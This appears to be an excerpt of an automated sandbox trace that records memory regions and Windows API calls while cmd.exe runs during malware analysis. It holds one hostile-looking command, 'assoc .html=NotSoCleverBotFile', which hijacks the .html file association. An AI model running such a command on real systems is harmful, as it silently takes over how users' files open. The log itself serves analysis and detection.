entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1885 start_va = 0x5c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1886 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1887 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1888 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1889 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1890 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1972 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1973 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1974 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1975 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1976 start_va = 0x800000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1977 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1978 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1979 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 1980 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1981 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1982 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1983 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1984 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1985 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1986 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1987 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1988 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1989 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1990 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1991 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1992 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1993 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1994 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1995 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1996 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1997 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1998 start_va = 0x920000 end_va = 0xaa7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 1999 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2000 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2001 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2002 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2003 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2004 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2005 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 2006 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 2007 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2008 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2009 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2010 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2011 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2012 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2013 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2014 start_va = 0x800000 end_va = 0x890fff monitored = 0 entry_point = 0x838cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2015 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Thread: id = 153 os_tid = 0x42c [0264.048] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0264.048] __set_app_type (_Type=0x1) [0264.048] __p__fmode () returned 0x74ac4d6c [0264.048] __p__commode () returned 0x74ac5b1c [0264.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0264.048] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0264.049] GetCurrentThreadId () returned 0x42c [0264.049] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x84 [0264.049] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0264.049] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0264.049] SetThreadUILanguage (LangId=0x0) returned 0x409 [0264.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0264.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0264.056] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.056] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0264.056] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0264.056] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0264.056] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0264.056] GetConsoleOutputCP () returned 0x1b5 [0264.063] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0264.063] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0264.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.064] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0264.070] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.071] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0264.075] _get_osfhandle (_FileHandle=1) returned 0x3c [0264.075] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0264.081] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.081] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0264.082] _get_osfhandle (_FileHandle=0) returned 0x38 [0264.082] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0264.108] GetEnvironmentStringsW () returned 0x707cf8* [0264.108] GetProcessHeap () returned 0x700000 [0264.108] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xa1a) returned 0x708720 [0264.108] FreeEnvironmentStringsA (penv="A") returned 1 [0264.108] GetProcessHeap () returned 0x700000 [0264.108] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4) returned 0x700550 [0264.108] GetEnvironmentStringsW () returned 0x707cf8* [0264.108] GetProcessHeap () returned 0x700000 [0264.108] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xa1a) returned 0x709148 [0264.108] FreeEnvironmentStringsA (penv="A") returned 1 [0264.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.109] RegCloseKey (hKey=0x94) returned 0x0 [0264.109] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0264.109] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0264.110] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0264.110] RegCloseKey (hKey=0x94) returned 0x0 [0264.110] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7524 [0264.110] srand (_Seed=0x620b7524) [0264.110] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .html=NotSoCleverBotFile" [0264.110] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .html=NotSoCleverBotFile" [0264.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0264.110] GetProcessHeap () returned 0x700000 [0264.110] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x210) returned 0x709b70 [0264.110] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x709b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0264.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0264.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0264.111] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.111] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0264.111] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0264.111] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0264.111] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0264.111] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0264.111] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0264.111] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0264.111] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0264.111] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0264.111] GetProcessHeap () returned 0x700000 [0264.112] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x708720) returned 1 [0264.112] GetEnvironmentStringsW () returned 0x707cf8* [0264.112] GetProcessHeap () returned 0x700000 [0264.112] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xa32) returned 0x70a7c8 [0264.112] FreeEnvironmentStringsA (penv="A") returned 1 [0264.112] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0264.112] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.112] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0264.112] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0264.112] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0264.112] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0264.113] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0264.113] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0264.113] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0264.113] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0264.113] GetProcessHeap () returned 0x700000 [0264.113] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x44) returned 0x7005c8 [0264.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0264.113] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0264.113] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0264.113] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x700618 [0264.113] FindClose (in: hFindFile=0x700618 | out: hFindFile=0x700618) returned 1 [0264.114] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x700618 [0264.114] FindClose (in: hFindFile=0x700618 | out: hFindFile=0x700618) returned 1 [0264.114] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0264.114] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x700618 [0264.114] FindClose (in: hFindFile=0x700618 | out: hFindFile=0x700618) returned 1 [0264.114] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0264.114] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0264.114] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0264.114] GetProcessHeap () returned 0x700000 [0264.115] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70a7c8) returned 1 [0264.115] GetEnvironmentStringsW () returned 0x707cf8* [0264.115] GetProcessHeap () returned 0x700000 [0264.115] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xa76) returned 0x709d88 [0264.115] FreeEnvironmentStringsA (penv="=") returned 1 [0264.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0264.115] GetProcessHeap () returned 0x700000 [0264.116] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7005c8) returned 1 [0264.116] GetProcessHeap () returned 0x700000 [0264.116] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400e) returned 0x70bc88 [0264.126] GetProcessHeap () returned 0x700000 [0264.126] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4a) returned 0x70a808 [0264.126] GetProcessHeap () returned 0x700000 [0264.126] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70bc88) returned 1 [0264.126] GetConsoleOutputCP () returned 0x1b5 [0264.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0264.140] GetUserDefaultLCID () returned 0x409 [0264.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0264.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0264.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0264.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0264.140] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0264.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0264.141] 